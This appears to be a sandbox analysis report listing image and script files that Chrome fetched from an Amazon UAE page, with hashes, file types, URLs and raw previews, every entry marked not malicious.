                                                                                                                                                                                                                                                                      SHA1:36F46FBD4D03D1E55BC0B0D4381D351620750532
                                                                                                                                                                                                                                                                      SHA-256:6641FF165206F0F54CD94518DED93DFCBFC7436A806B0DE96991CB3DA4032A8B
                                                                                                                                                                                                                                                                      SHA-512:AF530AF8E111A8B7DA4C2776253E6BDFD295E2A84A11EBCC020024E6B8364C6D75AC2C8BAE725D6441036BB3F163E74410F87F9C9B031417F16DA330C5C708DC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR.......'.............gAMA......a....KiCCPsRGB IEC61966-2.1..H..SgTS..=...BK...KoR.. RB..Ti........@...."....q....."..A...y.(..(6T....}..7o....9g..}>.F`.D....dJ....<6..'w..T ...@.-.................m@..n....8..P.....$......B....2r.2..2...t...%..[.....j..;e.O..v.$....(S*.@..@&.......X......`.(..s....`....`....).d....`...S......GE...3.(...x.W\!.S...d..T.n!...\].x.87C.P........ee......3...FvD.....9;.:;.8.:|...........?........E..............e..../.....B.._......T.B.fg...k+..m.._......_.....................2..r<[&..q.?......wL..'..b.P.GK..i....$.I...H.........k.`.~..B[P..... ..%....w......1...w..0....h....................4P.6h.>....#..;x...P..8X.BH.L.C.,.UP.%...B..Z..F8.-p.........<.^...0.o`.A.2.DX.6b..".#.Ef!~H0...!.H."E..Rd5R..#U.^....9..E.!=.=...F~C>...@..j..\...B...h....G...h%Z..B.......>G.0....3.l0...B.x,..c.b......6.....b#.{..."....;!.0. $,",'..........B.a...$....nD>1..B.%..+.u.c...[.......!..\H..8R.i......D:C.!....d.6..A.%...r.y;...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 750x300, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):17772
                                                                                                                                                                                                                                                                      Entropy (8bit):7.916838270669576
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:1IKB3dthG73h/d2JezRYETsuwS+fzkISXrf8jwQOiA:11t2PRFTHofzh8o2
                                                                                                                                                                                                                                                                      MD5:F8C5A6B00D7798BAEE06D7E6BEE0BCED
                                                                                                                                                                                                                                                                      SHA1:39104B348748423ED74C973D3188BD358436D173
                                                                                                                                                                                                                                                                      SHA-256:4B4B16B7122CC82BF2AE616353895C5F708ADA108CAF43B30AEF3239FDF7118E
                                                                                                                                                                                                                                                                      SHA-512:6B66061F0AD05364F9612B202A2929B1C21534F13F884919E41CD0A0C2476FABA4B8268CE47D8FF0FAED7C3A166CB3C9AAE1D07A81D872732C17B162D163A315
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........,....".........................................................................^....@...........>r~{..S.~.N..................(L=............. y76.A.Z=.D...............5y%WJ.Z.g.}.[...`...........s..N..}.{R.;..p.^.;..........Wx..:.^.....LWB.;.9.@.........<'S$..le..#..Z.{\..7.........9.;..w.W7E..!...U....w[...........V.|......jo6..-..>..P...........Q..<..;.w.#B...:Z.6..........._......i.;.w..q]............O.....j....:?........<....z.k....^....S...C......k.[W8..<..s..u..c..}.MB.u+.....h.....S.H.....,4[.B.+..$..v.r+...m.z[............V.x......1.._........@.`....-.s..=....y.p=:............G.jK.2.U.&0.DY.d.M.....@...m....[.lW.)........<...|.g.Q..{..*t:.......... .........Pj.....u....I...........T%....s..n............t^.>|....T..................p.....V8.oS.. .........+....^......kg...h..............+..2.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 264x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):19950
                                                                                                                                                                                                                                                                      Entropy (8bit):7.958723930791472
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:hileUazNnDX83VreNIWjDTpWrrQOVHEmLxJPFgcaVbSWTGkQ4QRO:pUkb818IEXpa7ZLxJtgtbJTTB
                                                                                                                                                                                                                                                                      MD5:6AD04D5101A445EE77EE68C26622CE0A
                                                                                                                                                                                                                                                                      SHA1:E5BE5B2406572E6B2D7E6837908394DAA962D9E8
                                                                                                                                                                                                                                                                      SHA-256:FD33D12083484545BE8B26D5B2484751F71D15FDEB8D561356CB797C0E34680A
                                                                                                                                                                                                                                                                      SHA-512:368F52DC2F9FB83A477B00DE946510C1AAD57B6BF5A0D260BFE93D9D362D791327C2BC3DE0207FD43452AA6184CC4BFB951177DBEB2734F802486DE8E6432822
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........6....................................................................%"IH..OU`qM..+.I).JD..%.%"IH.k#Z0Z5n{..W61..X....I)..I....H.+.Y..-I..%.BY..........A.~.-.........B....#.b..AM%b......?.......w.JE..H.C....l_T.i+...q.sQ...POb"T4..S=.R.....x."......Z......!..2.cR.7.@.b]f."O\P.=..Y7..O.JO0..*....T..$..S.K. .p.;D._A.R./a..[.m..<.C.Xi7..c...W..cA..........a.PO...C.Z...^vEmd..$....M..._c.cd..%.~^..,\q.VS(.....l..\y'N.o.y.}._.u.,..N.>r.{..a..o.r..Zcw..F.......:..++,.2"...u`.Y.p.r.e...D..u..a.%..Hej.dU..t.O.\....E.9.=...n.&../.f...j..;......m....../....O.........h.......S.U5...e...pE?].!\t#..3....F...K.l{-NXd.'...i....F.!!.C ,.1..#..)+..Wi...x..U.,-[.-..o?..T.....pe.R]..r.L%J.=.;Q6[.3....^.n.@..oi...zOw.1..x.^7yXJ.....9..c.t)...X.../...a..A.N$...KG.St.\{.kwF.....c}
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1324)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):34184
                                                                                                                                                                                                                                                                      Entropy (8bit):5.454621491893432
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:razIt2R6JfzUeQfAtvwtc3c197lv3KIYSYkjPtt1BqT+m/oq3LIWEsGRezyMstWh:r8yajtt1BIbBf9sk5EMUjW
                                                                                                                                                                                                                                                                      MD5:57705E246FC0B07123F46406E0EF8B90
                                                                                                                                                                                                                                                                      SHA1:87AF5FF64D16B051C0F193BE0A719839CD34E30C
                                                                                                                                                                                                                                                                      SHA-256:CD882008772F00375C695AB26513A2E82A6FDE78D96B56AC54B008DE1AED7516
                                                                                                                                                                                                                                                                      SHA-512:651661B530199C3B0D898D70F2D9914D0EE295F6B0ED095F30BF6FFF2A4F95B4160AB7498691C721EB267C39603403F3C1689CDB6F5FB65E80CE4541F0294AAB
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:'use strict';mix_d("SBXGwentCards__multi-brand-creative-desktop:multi-brand-creative-desktop__NVsJJViJ","exports tslib @c/dom @c/aui-utils @c/remote-operations @c/scoped-dom @c/logger @c/pagemarker @c/metrics @c/aui-feature-detect @c/browser-operations @p/a-ajax @c/aui-modal @p/A @c/aui-untrusted-ajax".split(" "),function(ra,w,ab,sa,bb,cb,db,eb,E,fb,ta,gb,hb,ib,jb){function H(a){return a&&"object"===typeof a&&"default"in a?a:{"default":a}}function I(a,b){return function(c){c=x(a,c);return b?b(c):.c}}function ua(a,b,c,d){b?(y("Send"+a+"Success"),c&&y("Send"+a+"Success_"+c),d&&y("Send"+a+"Success_"+d)):(y("Send"+a+"Failure"),c&&y("Send"+a+"Failure_"+c),d&&y("Send"+a+"Failure_"+d))}function va(a){return Array.isArray(a)?a.map(function(b){return w.__assign(w.__assign({},b),{width:0,height:0})}):{url:a.url,width:0,height:0}}var C=H(ab),wa=H(sa),xa=H(cb),Q=H(db),kb=H(eb),ya=H(E),lb=H(fb),da=H(ta),mb=H(gb),za=H(hb),R=H(ib),nb=H(jb),J,V;(function(a){a.Cornerstone="CSTONE";a.Axiom="AXIOM"})(V||
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):47992
                                                                                                                                                                                                                                                                      Entropy (8bit):5.605846858683577
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                                                                                                                                                                                                      MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                                                                                                                                                                                                      SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                                                                                                                                                                                                      SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                                                                                                                                                                                                      SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):1438
                                                                                                                                                                                                                                                                      Entropy (8bit):7.4301903007245205
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:24:TRe+0CmRdRaN9HFntvWdRJgVuSUy7IrLZeRMT9zZEkCuR1C7BMOqrr:TT0rTRm9lt+xg/WLZe6IraXH
                                                                                                                                                                                                                                                                      MD5:77F93C1FDBAFC67AE8AFF833FFEBF1CC
                                                                                                                                                                                                                                                                      SHA1:176864A0C17A47414D7C0B7D503753229D3677EB
                                                                                                                                                                                                                                                                      SHA-256:AA644C37917FCBCA55F6F942F6E6C72D065C8A25A6DA0F33D3CFA66DA76AC5AB
                                                                                                                                                                                                                                                                      SHA-512:C0E7FCF6B99A1F1DDA0219309512CB10877C8325A0D121FA88690D50B84E75AF90BECAC2ADF438E3964B7474883FAB9FCD723EEEE8AA3AF57ACF8CFCCEFFD700
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213328_UAE_3151165_153x125_en_AE._SY116_CB428587699_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!..1AQa..."#Rbq..$.................................................!1."#2Aa............?............T..4j.T..A..n6.{...U....*..4\|4.MgB...;...y....L..w.gS>U.................w...X.M.iv;J...t......#..m.{~..ce.?O..o..Tf.:%.V............d..W8C.kz.(/..}..CB......j<S....%.]..g...$...D..............P8Nj.........G.P..=....&..tD.3..K.p..o}.v........&...=.k..|..a.>.c.]wOw%..p./.....y...[..k.e..}6<..w..Q..p.Q.&..e.+".....u.u9N.T...%(.kri........\..... ........R.@..W:....m.....Y..d......................I>..Oj....vM.6..e.....*.c...nyj..nSWj7J...RQ.Si.7..._d......s..|M..}...'..+...\.s...?..t..8.s....m....z..Y.h.c.5..I...g..w...'q@.............1........W..u.......bQ.x.#.!/X....._F.Y...F.~.k|...I .....|...X,..<..._..TR.#.#..<.f.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1x1, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):285
                                                                                                                                                                                                                                                                      Entropy (8bit):3.992477276923708
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:6:7hHx7qC0o26Z+aW6Hri/aliltjDtqRXhP/lYYms9:7vTtRWPtsh/lz
                                                                                                                                                                                                                                                                      MD5:B1DF542B3846358E48A00920727A87EB
                                                                                                                                                                                                                                                                      SHA1:B3E8EE8554DA24238553747F8B2656739AD00FFD
                                                                                                                                                                                                                                                                      SHA-256:733E9DF98B6072B548E0D75DDAE41F62B4EB20996D3C06588B78D9963F57DB94
                                                                                                                                                                                                                                                                      SHA-512:3281B4C63BBADB693CC73281197675FCC8FBCB0671DE59C6F525C054C19EF274EC6738E872559FB077758406C7982E478C3B9F6D3C30A73DAF0E1716220C94F2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF.............C..............................................!........."$".$.......C............................................................................"............................................................................................................?...$..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):83172
                                                                                                                                                                                                                                                                      Entropy (8bit):7.740044293632772
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:xxTFvBEW7/gNYfnON5PekitKtvTsJR0v36QJ6tq+4+ASl+vdv/Qt:xp9B7MNYsigaR0v16t4zvdgt
                                                                                                                                                                                                                                                                      MD5:D632523E94A542B9C37CB7D5D4C6BE35
                                                                                                                                                                                                                                                                      SHA1:2DDAC51AE0F5A5DF9FE7F490958F62C73F30F8AB
                                                                                                                                                                                                                                                                      SHA-256:2AFB3483E5FA3D0C6230F0C4FD63FCF416B4243E7D049DCD1A6C5FE579EA031E
                                                                                                                                                                                                                                                                      SHA-512:77D17FD39011D5586A4DEC6047334FE3D53BC9FEF484D1CA97B74A475BEB1549B36AAEDC3F080C74F088FABF041D96F8DDDB9ABD1D4938589BE90F9C45CA001B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61cg-CaC1GL._SX1500_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..............Exif..II*...............4GJP........4=jumb....jumdc2pa.........8.q.c2pa...4.jumb...Gjumdc2ma.........8.q.urn:uuid:979e1c0b-bcac-4818-ac46-28859542a631.....jumb...)jumdc2as.........8.q.c2pa.assertions.....jumb...&jumdcbor.........8.q.c2pa.actions.....cbor.gactions..factionkc2pa.editedmsoftwareAgentmAdobe FireflyqdigitalSourceTypexShttp://cv.iptc.org/newscodes/digitalsourcetype/compositeWithTrainedAlgorithmicMedia....jumb...(jumdcbor.........8.q.c2pa.hash.data....|cbor.jexclusions..estart..flength.4Idnamenjumbf manifestcalgfsha256dhashX ./.......d....)95..:`.3qK..bG.BcpadI.............jumb...$jumdc2cl.........8.q.c2pa.claim.....cbor.hdc:titleoGenerated imageidc:formatjimage/jpegjinstanceIDx(xmp.iid:CF929F50514911EFA366EADDEB8D89B3oclaim_generatorx6Adobe_Photoshop/25.9.1 adobe_c2pa/0.9.3 c2pa-rs/0.31.0tclaim_generator_info..dnameoAdobe Photoshopgversionf25.9.1.isignaturex.self#jumbf=c2pa.signaturejassertions..curlx'self#jumbf=c2pa.assertions/c2pa.actionsdhashX Ji.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):13979
                                                                                                                                                                                                                                                                      Entropy (8bit):7.936123560673966
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:cjvhKjnc/CuQAhHYnmiZkt2jAxhejU0BLv0W:cjqnc/CktYnqtJUowL
                                                                                                                                                                                                                                                                      MD5:5E35B25AA7E9315564A80612D9F41775
                                                                                                                                                                                                                                                                      SHA1:37B5A58244AE2383F5D7F4D614330AFB3AB306E1
                                                                                                                                                                                                                                                                      SHA-256:0FA47274EF7A4E2A0BC046ED2B880D5FDCD8845465FBA98CD1AE615CF86E52AD
                                                                                                                                                                                                                                                                      SHA-512:392AFE004753E2DF90E1B537EEC82D41D1FC5F127116C79418CAA22C9D03F7F072E2A7EE7A215ED6172FF1374BA4FBE3AB84BE8F67919A2BE663A0AAB3AA021F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@.@.."..........5........................................................................5......qp..3or.YW................C).....q>^<.i.wn.l....k@.a....v..(...........Onq..@..0.&.k.S.....z<.&.h..r;.....y=w&4....\.c5.c8....S......F.A.....c.....'..0...r..z........7.M.C...s.&2/.$.....{ypW".o.....?./(.`.......3'..3....x.g.....g]........<..U..^....v.o.......o.#9..lK|4.y.{.5..*u.....b..2....w..~....|y.fG.I.k./...q...+Z7k.1.vR=..b.et..J..k....ja..........d...`...q..=_6g...|..m.8.}..>[..%sgO..q...8...x..l....o..i......1.,nK....? .".y.|....v......vvu..k.|=._...WY..k$...f.u.b:.2..._S......}..&.....3'...!.....k^.8....9...B?...lw<.........-\e_I.....t.....^.?NNh...M.,..@]....9......p.....|.S..O.....o-y..:..k...w.Xb...G....O....`..-.9...h...VR..........{......!..q..}..G...z....<Ry..6..."W...7......
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):5251
                                                                                                                                                                                                                                                                      Entropy (8bit):4.007103797896673
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:ZwBG7haF0FNhMii6Tgmmy9pei44Y9yVXVq73hPpvbdwMGCQPFdMBRlF+2uC:mG7AF0xZTgtyYi4Skhxvbd1GoBPf
                                                                                                                                                                                                                                                                      MD5:A11C57EF107CE654FE3DFB306612D23F
                                                                                                                                                                                                                                                                      SHA1:24317BC338A8F88AD65C4247AA283DE02A3A36B1
                                                                                                                                                                                                                                                                      SHA-256:4245DF78CB042E5712946A0740D216DD2E923AD6889BCB2BD431F963608A7149
                                                                                                                                                                                                                                                                      SHA-512:8EF22FC98D68198B9C32F42941A5777CBA06219637EF70A8555570C1C7BB3FDD3BD394AEA3FD87D188A2270A267D8E98A79B696185FF3AB32065F62BCB932CA3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/G/39/perc/prime-logo.svg
                                                                                                                                                                                                                                                                      Preview:<svg version="1.1" xmlns="http://www.w3.org/2000/svg" focusable="false" aria-hidden="true" viewBox="0 0 53 15" shape-rendering="geometricPrecision"><path d="M11.933,4.04C11.933,3.896 11.966,3.794 12.027,3.738C12.089,3.681 12.187,3.652 12.323,3.652L13.441,3.652C13.679,3.652 13.825,3.767 13.876,3.994L13.985,4.398C14.296,4.097 14.671,3.859 15.112,3.683C15.552,3.507 16,3.419 16.456,3.419C17.46,3.419 18.256,3.787 18.841,4.523C19.427,5.257 19.72,6.253 19.72,7.506C19.72,8.366 19.575,9.117 19.284,9.759C18.995,10.402 18.601,10.896 18.103,11.243C17.606,11.591 17.036,11.764 16.394,11.764C15.968,11.764 15.565,11.697 15.181,11.562C14.798,11.427 14.472,11.241 14.202,11.003L14.202,14.406C14.202,14.55 14.173,14.652 14.118,14.708C14.06,14.765 13.959,14.794 13.814,14.794L12.323,14.794C12.187,14.794 12.089,14.765 12.027,14.708C11.966,14.652 11.933,14.55 11.933,14.406L11.933,4.04ZM48.66,8.345C48.069,8.345 47.557,8.289 47.122,8.174C47.184,8.869 47.393,9.365 47.751,9.666C48.108,9.967 48.649,10.117 49.375,10
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:APAVCQJMFK78QJEV1PMZ$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3DAPAVCQJMFK78QJEV1PMZ%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D46215%26pc%3D49220%26at%3D49220%26t%3D1724264968414%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DAPAVCQJMFK78QJEV1PMZ%26aftb%3D1%26lob%3D1:49220
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1500x70, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):7969
                                                                                                                                                                                                                                                                      Entropy (8bit):7.794053054446247
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:ngzUMWvEQ0UAEqrrRD1T66qUoTQ0Dtlu2FyyI8QPMNwZ/br/N07L:gzFUAtnRDOQ0Dtkn8QnZn6v
                                                                                                                                                                                                                                                                      MD5:C313C83F8C90A364EC00968D60FD7A1C
                                                                                                                                                                                                                                                                      SHA1:C0D9D0855C2FE678D9EB67DACE249D77B611B001
                                                                                                                                                                                                                                                                      SHA-256:B9F32CF9AFF6033F1EDD36FF810A4AD6F4B404B1CCF16E6271632D742D600F5F
                                                                                                                                                                                                                                                                      SHA-512:2AB269272F1B6AEA27B7805357FDB7EC3F44CF28BA87FE85F0FC7F174B102E1953A55AC52FCE4232B6FB166D5D8F21DC82F90028FC6743EEFC13BDFB47EA22F5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/home/store/furniture/Garden_outdoor/New_L2/XCM_Manual_1270036_BAU_AE_OHL_OB_ATF_Foryourgardeningneeds_1500x70_En_426bab62-777f-4a93-abda-c23f5cc788a2.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF.............C............................................!!$$!!0///06666666666...C............................."......". ... .%%""%%//,//6666666666......F....".......................................M........................!..1AQ."aq2.......#56Brs...3S..$&Rb.....CETct...................................$....................!..1aAq."Q................?..4...:.O..8.-bXl.#.6..Qs.+....H....[.....^6.....6H.Y.....O.....[..pG.[k.Y@..."~g.1@:.R.<#........"......@..B.....J..g.`.3M......?.(.2Z....'..&.....~...Z.3V.>....e.].2...%"}..E).C..b........QF(R.(.T)J.Q*j..E..JP..5s.).Z..!.*...(..R..J.)B.*...(..R..T)J..P.(QD.R.(..JP..P.(QD.R.(..JP.J.)B.%B..@..R..J.)B.*.....R.(..JP.J.)B.%B..@..R..T)J.Q*...(..R..J.)B.*.....R.(.T)J.Q*.....R.(.T)J.Q*.....R.(..JP..P.(P%B..E..JP..P.(QD.R.(..JP..P.(P%B..@..R..T)J..P.(QD.R.(.T)J.Q*...(..R..J.)B.*...(..R..J.)B.%B..@..R..J.)B.*...(..R..J.)B.%B..@..R..T)J.Q*.....R.(.T)J.Q*.....R.(..JP..P.(P%B..@..R..J.)B.%M.MP..P..i.Z%B..E..JS.Q....D.R.E..JP..P.).
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
